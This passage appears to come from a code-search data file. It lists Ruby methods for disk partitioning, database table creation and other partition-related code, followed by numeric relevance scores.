"def full_format fstype, label = nil\n DebugLogger.info \"class = #{self.class.name}, method = #{__method__}\"\n delete_all_partitions unless partitions.blank?\n DebugLogger.info \"|#{self.class.name}|>|#{__method__}|:Creating partition #{self.kname}\"\n DiskUtils.create_partition self, 1, -1\n DebugLogger.info \"|#{self.class.name}|>|#{__method__}|:Find partition #{@kname}\"\n self.reload\n new_partition = self.partitions.last # Assuming new partition to be at the last index\n DebugLogger.info \"|#{self.class.name}|>|#{__method__}|:Formating #{@kname} to #{fstype}\"\n new_partition.format fstype and reload\n end",
"def partition(array, start_index, end_index)\n pivot = array[end_index]\n insert_index = start_index\n for i in start_index...end_index\n if array[i] <= pivot\n swap(array, i, insert_index)\n insert_index += 1\n end\n end\n swap(array, insert_index, end_index)\n return insert_index\nend",
"def copy_table(old_table_name, new_table_name)\n transaction do\n execute \"CREATE TABLE #{new_table_name} LIKE #{old_table_name}\"\n execute \"INSERT INTO #{new_table_name} SELECT * FROM #{old_table_name}\"\n end\n end",
"def partition_params\n params.require(:partition).permit(:name, :body, :chapter_id)\n end",
"def partitions\n [6, 3, 0].map { |n| model.id / 10**n % 1000 }\n end",
"def DeletePartitionTable(disk, label)\n Builtins.y2milestone(\"DeletePartitionTable disk:%1 label:%2\", disk, label)\n label = DefaultDiskLabel(disk) if Builtins.isempty(label)\n ret = @sint.destroyPartitionTable(disk, label)\n if ret<0\n Builtins.y2error(\"DeletePartitionTable sint ret:%1\", ret)\n end\n UpdateTargetMap()\n ret == 0\n end",
"def copy_table(old_table_name, new_table_name)\n transaction do\n execute \"CREATE TABLE #{new_table_name} LIKE #{old_table_name}\"\n execute \"INSERT INTO #{new_table_name} SELECT * FROM #{old_table_name}\"\n end\n end",
"def create_table(dataset, table, schema)\n api_debug('Creating table', dataset, table)\n table_id = com.google.cloud.bigquery.TableId.of dataset, table\n\n table_defn = com.google.cloud.bigquery.StandardTableDefinition.of schema\n table_info = com.google.cloud.bigquery.TableInfo.newBuilder(table_id, table_defn).build()\n\n @bigquery.create table_info\n end",
"def table_name(*partition_key_values)\n return collect_first(*partition_key_values, &:table_name)\n end",
"def ResizePartition(device, disk, new_cyls)\n Builtins.y2milestone(\n \"ResizePartition device:%1 disk:%2 new_cyls:%3\",\n device,\n disk,\n new_cyls\n )\n ret = @sint.resizePartition(device, new_cyls)\n if ret<0\n Builtins.y2error(\"ResizePartition sint ret:%1\", ret)\n end\n UpdateTargetMapDisk(disk)\n ret == 0\n end",
"def create_table(name, &block)\n g = Schema::Generator.new(self, &block)\n create_table_sql_list(name, *g.create_info).each {|sql| execute(sql)}\n end",
"def create(size)\n disk_id = uuid\n sh \"zfs create -o reservation=1024 -o quota=1024 #{base}/#{disk_id}\"\n disk_id\n end",
"def generate_partitioner(graph,partitioners,numReduceTask)\r\n \r\n puts\"--- PARTITIONER ---\" \r\n \r\n @Jobs.each do |current_job| \r\n \r\n if partitioners.size == 0\r\n return\r\n end\r\n \r\n numReduceTask_int = 1 # valore di default\r\n \r\n unless numReduceTask.size == 0\r\n numReduceTask.each do |inline|\r\n \r\n fields = inline.split('.')\r\n if current_job == fields[0] #se viene definito un setNumTask per qul job\r\n numReduceTask_int = fields[1].scan(/\\d+/)\r\n numReduceTask_int = numReduceTask_int.first.to_i\r\n else\r\n next\r\n end\r\n end \r\n \r\n if numReduceTask_int == 0 # viene imposto che non ci sará il reducer\r\n next # passo al prossimo ciclo di job\r\n end \r\n end \r\n\r\n fields = partitioners.first.split('.')\r\n \r\n # se il job da analizzare é uguale a quello corrente => lo lavoro\r\n if current_job == fields[0] \r\n partitioner_name = current_job + \".\" + \"PARTITIONER_\" + fields[1].split('(')[1]\r\n \r\n #aggiungo il nodo partitioner\r\n graph.add_node(partitioner_name,\"is_partitioner\")\r\n puts \"aggiunto partitioner:\" + partitioner_name\r\n \r\n # chiudo i nodi pendenti ( job per job) \r\n Close_ALL_pending_links(graph,current_job,partitioner_name)\r\n \r\n for i in(1..numReduceTask_int)\r\n @OpenLink.push(partitioner_name); \r\n end \r\n end \r\n end #do jobs\r\n \r\n end",
"def createStakeholderTable\n @Handle.execute( @StakeholderSchema ) \n end",
"def AddMountPointsForWinParts(partitions, primary, max_prim, foreign_nr)\n partitions = deep_copy(partitions)\n return if !Arch.i386 && !Arch.ia64 && !Arch.x86_64\n\n foreign_ids = \"CDEFGHIJKLMNOPQRSTUVW\"\n\n Builtins.foreach(partitions) do |partition|\n new_partition = deep_copy(partition)\n fsid = Ops.get_integer(partition, \"fsid\", Partitions.fsid_native)\n partnum = 0\n if Builtins.haskey(partition, \"nr\") &&\n Ops.is_integer?(Ops.get(partition, \"nr\", 0))\n partnum = Ops.get_integer(partition, \"nr\", 0)\n end\n if !Builtins.haskey(partition, \"mount\") &&\n !Ops.get_boolean(partition, \"delete\", false) &&\n Ops.less_or_equal(partnum, max_prim) == primary &&\n Ops.less_than(foreign_nr.value, 24) &&\n Partitions.IsDosWinNtPartition(fsid) &&\n !Arch.ia64 &&\n !IsEfiPartition(partition) &&\n Ops.greater_or_equal(\n Ops.get_integer(partition, \"size_k\", 0),\n 1024 * 1024\n ) &&\n Builtins.contains(\n [:vfat, :ntfs],\n Ops.get_symbol(partition, \"used_fs\", :none)\n )\n Ops.set(\n new_partition,\n \"fstopt\",\n FileSystems.DefaultFstabOptions(partition)\n )\n if Builtins.contains(Partitions.fsid_dostypes, fsid)\n Ops.set(\n new_partition,\n \"mount\",\n Ops.add(\n \"/dos/\",\n Builtins.substring(foreign_ids, foreign_nr.value, 1)\n )\n )\n foreign_nr.value = Ops.add(foreign_nr.value, 1)\n else\n Ops.set(\n new_partition,\n \"mount\",\n Ops.add(\n \"/windows/\",\n Builtins.substring(foreign_ids, foreign_nr.value, 1)\n )\n )\n foreign_nr.value = Ops.add(foreign_nr.value, 1)\n end\n ChangeVolumeProperties(new_partition)\n Builtins.y2milestone(\"win part %1\", new_partition)\n end\n end\n\n nil\n end",
"def dump_partition_indexes(partitioned_table, stream)\n return unless Tablature.database.respond_to?(:indexes_on)\n\n indexes = Tablature.database.indexes_on(partitioned_table.name)\n return if indexes.empty?\n\n add_index_statements = indexes.map do |index|\n table_name = remove_prefix_and_suffix(index.table).inspect\n \" add_index #{([table_name] + index_parts(index)).join(', ')}\"\n end\n\n stream.puts add_index_statements.sort.join(\"\\n\")\n stream.puts\n end",
"def create_table!(*args, &block)\n drop_table(model.table_name)\n create_table(*args, &block)\n end",
"def _create_record(attribute_names = self.attribute_names)\n # ****** BEGIN PARTITIONED PATCH ******\n if self.id.nil? && self.class.respond_to?(:prefetch_primary_key?) && self.class.prefetch_primary_key?\n self.id = self.class.connection.next_sequence_value(self.class.sequence_name)\n attribute_names |= [\"id\"]\n end\n\n if self.class.respond_to?(:partition_keys)\n attribute_names |= self.class.partition_keys.map(&:to_s)\n end\n # ****** END PARTITIONED PATCH ******\n\n attributes_values = arel_attributes_with_values_for_create(attribute_names)\n\n new_id = self.class.unscoped.insert attributes_values\n self.id ||= new_id if self.class.primary_key\n\n @new_record = false\n id\n end",
"def create_table(table)\n db_client.query(\"SHOW CREATE TABLE #{table['name']}\").first['Create Table'] + ';'\n end",
"def add_topic(topic, partitions=nil)\n if partitions.is_a? Integer\n partitions = (0..partitions - 1)\n end\n if partitions.nil?\n Rdkafka::Bindings.rd_kafka_topic_partition_list_add(\n @tpl,\n topic,\n -1\n )\n else\n partitions.each do |partition|\n Rdkafka::Bindings.rd_kafka_topic_partition_list_add(\n @tpl,\n topic,\n partition\n )\n end\n end\n end",
"def create_table_cell_portion(name, slide_index, shape_index, row_index, cell_index, paragraph_index, dto, password = nil, folder = nil, storage = nil)\n data, _status_code, _headers = create_table_cell_portion_with_http_info(name, slide_index, shape_index, row_index, cell_index, paragraph_index, dto, password, folder, storage)\n data\n end",
"def add_key(name, type, clustering_order = nil)\n if @partition_key_columns.empty?\n unless clustering_order.nil?\n raise ArgumentError,\n \"Can't set clustering order for partition key #{name}\"\n end\n add_partition_key(name, type)\n else\n add_clustering_column(name, type, clustering_order)\n end\n end",
"def create!\n destroy!\n tables.each(&:create)\n end",
"def changepartition(partition, filename)\n\tbaseaddress = PARTITIONS['boot'][START]\t\n\tsize = partition[SIZE]\n\tpartdata = Flashimage.read(filename)\n\tlength = partdata.size\n\tlast = partition[SIZE]\n\traise('Input file too large.') if length + 12 > last\n\tcrc32 = Zlib.crc32(partdata)\n\tpartdata[length ... last - 12] = \"\\xff\" * (last - length - 12)\n\tpartdata[last - 12 ... last] = [length, 0x12345678, crc32].pack('V3')\n\tfilename = \"#{File.dirname(FLASHIMAGE)}/#{partition[FILE]}\"\n\tFlashimage.write(partdata, filename)\nend",
"def create_temp_table\n RailsRedshiftReplicator.connection.exec \"CREATE TEMP TABLE #{temporary_table_name} (LIKE #{replication.target_table})\"\n end",
"def partitioned_state\n super\n end",
"def create_pruned_table(conn)\n if !conn.list_tables.include?('pruned')\n query = \"CREATE TABLE `pruned` ( `table_name` VARCHAR(64) NOT NULL PRIMARY KEY, `prune_time` DATETIME NOT NULL )\"\n if @dry_run\n verbose query\n else\n conn.query query\n end\n end\n end",
"def create_kinesis_loads_table(exec=true)\n schema= {\n :columns => {\n :stream_name => { :type => 'varchar(64)' },\n :shard_id => { :type => 'varchar(64)' },\n :table_name => { :type => 'varchar(64)' },\n :starting_sequence_number => { :type => 'varchar(64)' },\n :ending_sequence_number => { :type => 'varchar(64)' },\n :load_timestamp => { :type => 'timestamp', :constraint => 'not null' }\n },\n :sortkey => 'load_timestamp'\n }\n\n return create_table_from_schema('kinesis_loads',exec,schema)\n end",
"def create_topic(name, partitions: nil, replication_factor: nil, config: nil)\n raise ArgumentError, \"partitions must be a positive integer\" if Integer(partitions) <= 0\n raise ArgumentError, \"replication_factor must be a positive integer\" if Integer(replication_factor) <= 0\n\n Kazoo::Topic.create(self, name, partitions: Integer(partitions), replication_factor: Integer(replication_factor), config: config)\n end",
"def partition(id)\n partitions.detect {|partition| partition.id == id}\n end",
"def partition_proposition(proposition)\n @remainder &= proposition\n @left &= proposition\n @right &= proposition\n end",
"def from(value)\n using(partition: value)\n end",
"def key_partition\n Dynamoid::Config.partitioning? ? \".#{Random.rand(Dynamoid::Config.partition_size)}\" : ''\n end",
"def setup_lvm_on_partition(part)\n return unless part.lvm\n\n pvol = \"/dev/disk/by-partlabel/#{part.label}\"\n execute!(\"pvcreate -y #{pvol}\")\n execute!(\"vgcreate -y #{part.lvm.vg_name} #{pvol}\")\n\n # any \"open ended\" volumes (no size specified), we deal with last\n unspec_vol = nil\n\n notice(\"Creating LVM partitions\")\n part.lvm.volumes.each do |vol|\n if not vol.size_mb.is_a?(Integer)\n unspec_vol = vol\n next\n end\n\n info(\"Creating #{vol.label} volume\")\n execute!(\"lvcreate -y --name #{vol.label} --size #{vol.size_mb}MiB #{part.lvm.vg_name}\")\n next if not vol.fs\n\n create_filesystem(vol.fs, \"/dev/#{part.lvm.vg_name}/#{vol.label}\", vol.label)\n end\n\n if unspec_vol\n vol = unspec_vol\n info(\"Creating #{vol.label} volume\")\n execute!(\"lvcreate -y --name #{vol.label} -l 100%FREE #{part.lvm.vg_name}\")\n if vol.fs\n create_filesystem(vol.fs, \"/dev/#{part.lvm.vg_name}/#{vol.label}\", vol.label)\n end\n end\n end",
"def create_table(name, &block)\n DB.drop_table? name if @opts.drop_tables?\n DB.create_table? name.to_sym, &block\n info \"Setup database table: #{name}\"\n end",
"def partition(arr, number)\n new_arr = Array.new(2) {Array.new()}\n\n arr.each do |ele|\n ele < number ? new_arr[0] << ele : new_arr[1] << ele\n end\n new_arr\nend",
"def create(tableName, args)\n now = Time.now \n # Pass table name and an array of Hashes. Later, test the last\n # array to see if its table options rather than column family spec.\n raise TypeError.new(\"Table name must be of type String\") \\\n unless tableName.instance_of? String\n # For now presume all the rest of the args are column family\n # hash specifications. TODO: Add table options handling.\n htd = Java::OrgApacheHadoopHbase::HTableDescriptor.new(tableName)\n for arg in args\n if arg.instance_of? String\n htd.addFamily(Java::OrgApacheHadoopHbase::HColumnDescriptor.new(makeColumnName(arg)))\n else\n raise TypeError.new(arg.class.to_s + \" of \" + arg.to_s + \" is not of Hash type\") \\\n unless arg.instance_of? Hash\n htd.addFamily(hcd(arg))\n end\n end\n @admin.createTable(htd)\n end",
"def create_fund_table\n Bsf::Scraper.db.create_fund_table\n end",
"def gen_partition_script(number_of_volumes, mount_point_prefix, resize_root_vol = false)\n resize_root = resize_root_vol ? 0 : 1\n template = <<-END.gsub(/^ {6}/, '')\n #!/bin/bash\n RESIZE_ROOT=<%= resize_root %>\n if [ $RESIZE_ROOT -eq 0 ]; then\n echo \"Resizing the root partition\"\n resize2fs /dev/`cat /proc/partitions | awk '/xvd*/ {print $4}' | head -n1`\n fi\n NUM_OF_VOLS=<%= number_of_volumes %>\n if [ $NUM_OF_VOLS -ne 0 ]; then\n DEVICES=`cat /proc/partitions | awk '/xvd*/ {print $4}' | tail -n<%= number_of_volumes %>`\n echo \"Formatting and mounting initiated\"\n count=1\n for dev in $DEVICES; do\n echo \"Formatting and mounting $dev\"\n fdisk -u /dev/$dev << EOF\n n\n p\n 1\n\n\n w\n EOF\n mkfs.ext4 /dev/${dev}1\n data_dir=$((count++))\n mkdir -p <%= mount_point_prefix %>/${data_dir}\n mount /dev/${dev}1 <%= mount_point_prefix %>${data_dir}\n done\n fi\n END\n ERB.new(template).result(binding)\n end",
"def create_products_table\n c = PGconn.new(:host => \"localhost\", :dbname => dbname)\n c.exec %q{\n CREATE TABLE products (\n id SERIAL PRIMARY KEY,\n name varchar(255),\n price decimal,\n description text\n );\n }\n c.close\nend"
] |
[
"0.7107491",
"0.69653577",
"0.6848916",
"0.6785471",
"0.66725737",
"0.6580608",
"0.6522106",
"0.64445055",
"0.64298666",
"0.6402236",
"0.6396007",
"0.61293477",
"0.6125929",
"0.60874057",
"0.6074051",
"0.60464454",
"0.5834928",
"0.5782722",
"0.57125735",
"0.5685198",
"0.5628669",
"0.5592334",
"0.5436821",
"0.543118",
"0.5377042",
"0.534393",
"0.5286028",
"0.5278216",
"0.5268954",
"0.5242946",
"0.52339214",
"0.5228444",
"0.5160669",
"0.51463825",
"0.5084462",
"0.5069188",
"0.5054688",
"0.5036526",
"0.5031731",
"0.501652",
"0.5013969",
"0.49931073",
"0.49791104",
"0.49745184",
"0.49639827",
"0.49445394",
"0.4933253",
"0.49150392",
"0.48947692",
"0.48751003",
"0.48659527",
"0.48521003",
"0.48384234",
"0.48260427",
"0.48189345",
"0.4816153",
"0.47832957",
"0.47799495",
"0.47730199",
"0.47691697",
"0.4764834",
"0.47617468",
"0.47568747",
"0.4747163",
"0.47438416",
"0.47385028",
"0.47175363",
"0.4714879",
"0.47148252",
"0.46962127",
"0.4688624",
"0.46877864",
"0.46849662",
"0.4674037",
"0.4669365",
"0.46686816",
"0.46499944",
"0.4647793",
"0.46403417",
"0.46397215",
"0.4638581",
"0.46166396",
"0.4615434",
"0.46116957",
"0.4608867",
"0.46082178",
"0.45991406",
"0.45941415",
"0.45856294",
"0.45803827",
"0.45788983",
"0.45737675",
"0.45720154",
"0.45627013",
"0.45607054",
"0.45595574",
"0.45535716",
"0.45492747",
"0.45287985",
"0.45236766"
] |
0.681942
|
3
|
SQL for creating a partition of another table.
|
def create_partition_of_table_sql(name, generator, options)
sql = create_table_prefix_sql(name, options).dup
sql << " PARTITION OF #{quote_schema_table(options[:partition_of])}"
case generator.partition_type
when :range
from, to = generator.range
sql << " FOR VALUES FROM #{literal(from)} TO #{literal(to)}"
when :list
sql << " FOR VALUES IN #{literal(generator.list)}"
when :hash
mod, remainder = generator.hash_values
sql << " FOR VALUES WITH (MODULUS #{literal(mod)}, REMAINDER #{literal(remainder)})"
else # when :default
sql << " DEFAULT"
end
sql << create_table_suffix_sql(name, options)
sql
end
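
# --- Illustrative usage (not part of the original snippet) ---
# A minimal sketch, assuming this method is reached through Sequel's
# PostgreSQL adapter when create_table is given a :partition_of option and a
# block evaluated by CreatePartitionOfTableGenerator (which supplies the
# partition_type, range, list, and hash_values readers used above). The
# connection URL and table names below are hypothetical.
#
#   require 'sequel'
#   DB = Sequel.connect('postgres://localhost/mydb')
#
#   DB.create_table(:measurements_2024, partition_of: :measurements) do
#     from 2024
#     to 2025
#   end
#   # => CREATE TABLE "measurements_2024" PARTITION OF "measurements"
#   #    FOR VALUES FROM (2024) TO (2025)
#
#   DB.create_table(:measurements_default, partition_of: :measurements) do
#     default
#   end
#   # => CREATE TABLE "measurements_default" PARTITION OF "measurements" DEFAULT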
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def create_partition_of_table_from_generator(name, generator, options)\n execute_ddl(create_partition_of_table_sql(name, generator, options))\n end",
"def create_range_partition(table_name, options, &block)\n raise ArgumentError, 'partition_key must be defined' if options[:partition_key].nil?\n\n Tablature.database.create_range_partition(table_name, options, &block)\n end",
"def create_table(name, options=OPTS, &block)\n if options[:partition_of]\n create_partition_of_table_from_generator(name, CreatePartitionOfTableGenerator.new(&block), options)\n return\n end\n\n super\n end",
"def addPartition(ptStr)\n pts_array = ptStr.split(',')\n sqlstr = \"ALTER TABLE \" + @mProjectName + \".\" + @mTableName\n sqlstr = sqlstr + \" ADD IF NOT EXISTS\" + \" PARTITION (\"\n pts_array.each { |pt|\n ptkv = pt.split('=')\n if ptkv.size != 2\n raise \"invalid partition spec\" + pt\n end\n sqlstr += ptkv[0] + '=' + \"'\" + ptkv[1] + \"'\" + ','\n }\n sqlstr = sqlstr[0..-2] + \");\"\n taskName = \"SQLAddPartitionTask\"\n runSQL(taskName, sqlstr)\n end",
"def create_partitions\n info(\"Creating disk with #{PARTITION_TABLE_TYPE} parition table\")\n execute!(\"parted -s #{@dev} mklabel #{PARTITION_TABLE_TYPE}\")\n\n start_size = FIRST_PARTITION_OFFSET\n end_size = FIRST_PARTITION_OFFSET\n\n unspec_part = nil\n\n # Create the partitions\n @partition_layout.each_with_index do |part, index|\n # Deal with any \"open ended\" partitions last\n if not part.size_mb.is_a?(Integer)\n unspec_part = part\n next\n end\n\n start_size = end_size\n end_size += part.size_mb\n\n info(\"Creating partition #{part.label} (#{part.fs}, #{part.size_mb}MiB)\")\n execute!(\"parted #{@dev} mkpart #{part.label} #{part.fs} #{start_size}MiB #{end_size}MiB\")\n\n (part.flags || {}).each_pair { |k, v|\n info(\"Setting partition flag #{k} to #{v}\")\n execute!(\"parted #{@dev} set #{index + 1} #{k} #{v}\")\n }\n\n label_path = \"/dev/disk/by-partlabel/#{part.label}\"\n self.wait_for_device(label_path)\n\n if not part.fs\n warn(\"No filesystem specified for #{part.label}. Skipping FS\")\n else\n create_filesystem(part.fs, label_path, part.label)\n end\n\n if part.lvm\n notice(\"Setting up LVM on #{part.label}\")\n setup_lvm_on_partition(part)\n end\n end\n\n # Deal with any \"open ended\" partitions (that have an unspecified size_mb)\n if unspec_part\n part = unspec_part\n info(\"Creating partition #{part.label} (#{part.fs}, 100% remaining)\")\n execute!(\"parted #{@dev} mkpart #{part.label} #{part.fs} #{end_size}MiB 100%\")\n\n (part.flags || {}).each_pair { |k, v|\n info(\"Setting partition flag #{k} to #{v}\")\n execute!(\"parted #{@dev} set #{@partition_layout.length} #{k} #{v}\")\n }\n\n label_path = \"/dev/disk/by-partlabel/#{part.label}\"\n self.wait_for_device(label_path)\n create_filesystem(part.fs, label_path, part.label) if part.fs\n\n if part.lvm\n notice(\"Setting up LVM on #{part.label}\")\n setup_lvm_on_partition(part)\n end\n end\n\n nil\n end",
"def create_partition device, partition_type = 'primary', start_unit, end_unit\n command = 'parted'\n params = \"#{device.path} -s -a optimal unit MB mkpart #{partition_type} ext3 #{start_unit} -- #{end_unit}\"\n parted = CommandsExecutor.new command, params\n parted.execute\n raise \"Command execution error: #{parted.stderr.read}\" if not parted.success?\n probe_kernal device\n end",
"def CreatePartition(disk, device, ptype, id, start, len, mby)\n Builtins.y2milestone(\n \"CreatePartition disk:%1 device:%2 ptype:%3 id:%4 start:%5 len:%6 mby:%7\",\n disk,\n device,\n ptype,\n id,\n start,\n len,\n mby\n )\n pt = fromSymbol(@conv_ptype, ptype)\n Builtins.y2milestone(\"CreatePartition type:%1 pt:%2\", ptype, pt)\n ret, cdev = @sint.createPartition(disk, pt, start, len)\n cdev = \"\" if ret<0\n if device != cdev\n Builtins.y2error(\"CreatePartition device:%1 cdev:%2\", device, cdev)\n end\n Builtins.y2error(\"CreatePartition ret %1\", ret) if ret<0\n ret = @sint.changePartitionId(device, id)\n Builtins.y2error(\"CreatePartition ret %1\", ret) if ret<0\n tmp = fromSymbol(@conv_mountby, mby)\n @sint.changeMountBy(device, tmp)\n Builtins.y2milestone(\"CreatePartition sint ret:%1\", ret)\n UpdateTargetMap()\n ret == 0\n end",
"def add_partition_key(name, type)\n PartitionKey.new(name, type(type)).tap do |column|\n @partition_key_columns << add_column(column)\n end\n end",
"def create\n begin\n # Set the partition (/dev/sdb1), device (/dev/sdb) and alignment (optimal,minimal,none etc.) variables\n partition= resource[:name]\n device=partition[0,(partition.length-1)]\n alignment= resource[:alignment]\n\n # Now we can create the partition\n partitions = parted('-a', resource[:alignment],'--script',device,'mklabel',resource[:part_label],'mkpart', resource[:part_type],resource[:fs_type],resource[:p_begin],resource[:p_end])\n rescue Puppet::ExecutionFailure => e\n false\n end\n end",
"def create_range_partition_of(parent_table_name, options)\n if (options[:range_start].nil? || options[:range_end].nil?) && options[:default].blank?\n raise ArgumentError, 'range_start and range_end or default must be defined'\n end\n\n Tablature.database.create_range_partition_of(parent_table_name, options)\n end",
"def create_side_table\n RailsRedshiftReplicator.connection.exec \"CREATE TABLE #{temporary_table_name} (LIKE #{replication.target_table})\"\n end",
"def create_partition_to_fill_disk(disk)\n # @disk.create_partition('primary', '100%')\n disk.create_partition_table # LinuxAdmin::Disk.create_partition has this already...\n AwesomeSpawn.run!(\"parted -s #{disk.path} mkpart primary 0% 100%\")\n\n # FIXME: Refetch the disk after creating the partition\n disk = LinuxAdmin::Disk.local.find { |d| d.path == disk.path }\n disk.partitions.first\n end",
"def partition_type\n raise Error, \"Unable to determine partition type, multiple different partitioning methods called\" if [@from || @to, @list, @modulus || @remainder, @default].compact.length > 1\n\n if @from || @to\n raise Error, \"must call both from and to when creating a partition of a table if calling either\" unless @from && @to\n :range\n elsif @in\n :list\n elsif @modulus || @remainder\n raise Error, \"must call both modulus and remainder when creating a partition of a table if calling either\" unless @modulus && @remainder\n :hash\n elsif @default\n :default\n else\n raise Error, \"unable to determine partition type, no partitioning methods called\"\n end\n end",
"def create_partition(size = nil, type = Partition.PartitionType[:TYPE_PRIMARY])\n DiskUtils.create_partition self, size[:start_block], size[:end_block]\n partitions = Device.find(self).partitions\n return partitions.last\n end",
"def create_table?(name, options=OPTS, &block)\n if options[:partition_of]\n create_table(name, options.merge!(:if_not_exists=>true), &block)\n return\n end\n\n super\n end",
"def partition_list()\nend",
"def addPartition(ptStr)\n @mOdpsTable.addPartition(ptStr)\n end",
"def create_list_partition_of(parent_table_name, options)\n if options[:values].blank? && options[:default].blank?\n raise ArgumentError, 'values or default must be defined'\n end\n\n Tablature.database.create_list_partition_of(parent_table_name, options)\n end",
"def partitioned_tables\n PartitionedTables.new(connection).all\n end",
"def create_with_partition(partition)\n NicView.new(fqdd.gsub(/[-]\\d+$/, \"-#{partition}\"))\n end",
"def create(key_hash)\n # TODO: Raise if a key missing\n @model.transaction do\n partition = partition_class.create!(key_hash)\n @keys.create_partition_tables(@model, :key_hash => key_hash)\n # TODO: Indexes\n partition\n end\n end",
"def set_partition\n @partition = Partition.find(params[:id])\n end",
"def create_blob_table(name, shard_count = 5, replicas = 0)\n stmt = %{CREATE BLOB TABLE \"#{name}\" CLUSTERED INTO ? SHARDS WITH (number_of_replicas=?)}\n execute stmt, [shard_count, replicas]\n end",
"def partition!(id)\n partition(id) || ErrorCode[:unknown_topic_or_partition].raise\n end",
"def tnTableCreation(tableName)\n pk_list = @pkList.join(',')\n pk_list = \"#{pk_list},branch_name,node_name\"\n q = QueryBuilder.create_tbl(tableName, pk_list, \"select #{@pkSelect}, 0 as test_id,''::varchar(30) as node_name, ''::varchar(30) as branch_name, ''::varchar(5) as type from #{@fTable} f where 1 = 0\")\n # pp q\n DBConn.exec(q)\n\n # q=\"ALTER TABLE #{tableName} add column test_id int, add column node_name varchar(30), add column branch_name varchar(30), add column type varchar(5);\"\n # DBConn.exec(q)\n # pk=@pkList.join(',')\n # # add index\n # q=\"create index ix_#{tableName}t on #{tableName} (#{pk},branch_name);\"\n # pp q\n # DBConn.exec(q)\n end",
"def partition\n PredicatePartition.new(predicate, operand.left.header, operand.right.header)\n end",
"def add_partition_to_node( tp, node )\n\n @nodes_lists_replicas[node][tp] = ''\n @partitions_lists[tp]['replicas'] ||= {}\n @partitions_lists[tp]['replicas'][node] = ''\n end",
"def partition(partition_key)\n state_depth_must_be(States::RELATION)\n if @current_relation.partitions.include?(partition_key)\n raise \"duplicate partition key #{partition_key}\"\n end\n @current_relation.partitions << partition_key\n end",
"def dump_partition_indexes(partitioned_table, stream)\n return unless Tablature.database.respond_to?(:indexes_on)\n\n indexes = Tablature.database.indexes_on(partitioned_table.name)\n return if indexes.empty?\n\n add_index_statements = indexes.map do |index|\n table_name = remove_prefix_and_suffix(index.table).inspect\n \" add_index #{([table_name] + index_parts(index)).join(', ')}\"\n end\n\n stream.puts add_index_statements.sort.join(\"\\n\")\n stream.puts\n end",
"def create_slice(col_name, col_value)\n ds = @data_source.create_sliced_table(col_name, col_value)\n dsp = self.class.new(ds.name, ds)\n def dsp.release; @data_source.release end\n dsp\n end",
"def list_partitions(table_name, params = {})\n all_params = approved_tables.smash(table_name, params)\n validation.validate_parameters(all_params)\n partitions(all_params)\n end",
"def create_table_with_inherits(table_name, options = {}, &block)\n options[:primary_key] = \"#{options[:inherits]}_id\" if options[:inherits]\n\n create_table_without_inherits(table_name, options) do |table_defintion|\n yield table_defintion \n end \n end",
"def partitions\n [6, 3, 0].map { |n| model.id / 10**n % 1000 }\n end",
"def create_prejoined_fact_table(options={})\r\n connection.transaction {\r\n drop_prejoin_fact_table\r\n\r\n connection.create_table(prejoined_table_name, :id => false) do |t|\r\n # get all columns except the foreign_key columns for prejoined dimensions\r\n columns.each do |c|\r\n t.column(c.name, c.type) unless excluded_foreign_key_names.include?(c.name)\r\n end\r\n #prejoined_columns\r\n prejoined_fields.each_pair do |key, value|\r\n dclass = dimension_class(key)\r\n dclass.columns.each do |c|\r\n t.column(c.name, c.type) if value.include?(c.name.to_sym) \r\n end\r\n end\r\n end\r\n }\r\n end",
"def gen_partition_script(number_of_volumes, mount_point_prefix, resize_root_vol = false)\n resize_root = resize_root_vol ? 0 : 1\n template = <<-END.gsub(/^ {6}/, '')\n #!/bin/bash\n RESIZE_ROOT=<%= resize_root %>\n if [ $RESIZE_ROOT -eq 0 ]; then\n echo \"Resizing the root partition\"\n resize2fs /dev/`cat /proc/partitions | awk '/xvd*/ {print $4}' | head -n1`\n fi\n NUM_OF_VOLS=<%= number_of_volumes %>\n if [ $NUM_OF_VOLS -ne 0 ]; then\n DEVICES=`cat /proc/partitions | awk '/xvd*/ {print $4}' | tail -n<%= number_of_volumes %>`\n echo \"Formatting and mounting initiated\"\n count=1\n for dev in $DEVICES; do\n echo \"Formatting and mounting $dev\"\n fdisk -u /dev/$dev << EOF\n n\n p\n 1\n\n\n w\n EOF\n mkfs.ext4 /dev/${dev}1\n data_dir=$((count++))\n mkdir -p <%= mount_point_prefix %>/${data_dir}\n mount /dev/${dev}1 <%= mount_point_prefix %>${data_dir}\n done\n fi\n END\n ERB.new(template).result(binding)\n end",
"def attach_to_range_partition(parent_table_name, options)\n raise ArgumentError, 'name must be defined' if options[:name].blank?\n if (options[:range_start].nil? || options[:range_end].nil?) && options[:default].blank?\n raise ArgumentError, 'range_start and range_end or default must be defined'\n end\n\n Tablature.database.attach_to_range_partition(parent_table_name, options)\n end",
"def key_partition\n Dynamoid::Config.partitioning? ? \".#{Random.rand(Dynamoid::Config.partition_size)}\" : ''\n end",
"def partition_for!(key)\n if leader_available?\n # Use the configured partitioner\n partition_id = partitioner.call(key, available_partitions.count, partitions.count)\n partition!(partition_id)\n else\n error_code.raise\n end\n end",
"def table_name(*partition_key_values)\n return collect_first(*partition_key_values, &:table_name)\n end",
"def partition_params\n params.require(:partition).permit(:name, :body, :chapter_id)\n end",
"def add!(partition, dirty = false)\n if @list[partition.name].nil?\n @list[partition.name] = partition\n else\n @list[partition.name].merge!(partition, simulate = false, dirty)\n end\n self\n end",
"def create_kinesis_loads_table(exec=true)\n schema= {\n :columns => {\n :stream_name => { :type => 'varchar(64)' },\n :shard_id => { :type => 'varchar(64)' },\n :table_name => { :type => 'varchar(64)' },\n :starting_sequence_number => { :type => 'varchar(64)' },\n :ending_sequence_number => { :type => 'varchar(64)' },\n :load_timestamp => { :type => 'timestamp', :constraint => 'not null' }\n },\n :sortkey => 'load_timestamp'\n }\n\n return create_table_from_schema('kinesis_loads',exec,schema)\n end",
"def partition_device\n Souffle::Log.info \"#{@node.log_prefix} Partitioning the device...\"\n provider.partition(@node)\n end",
"def partition(arr, n)\n\nend",
"def createStakeholderTable\n @Handle.execute( @StakeholderSchema ) \n end",
"def partitions( partition_count, &proc )\n Enumerable.partition_sizes( self.size, partition_count ) do |partition|\n partitioned_collection = []\n consumed_so_far = 0\n partition.each do |partition_size|\n partitioned_collection << self[ consumed_so_far, partition_size ]\n consumed_so_far += partition_size\n end\n yield partitioned_collection\n end\n end",
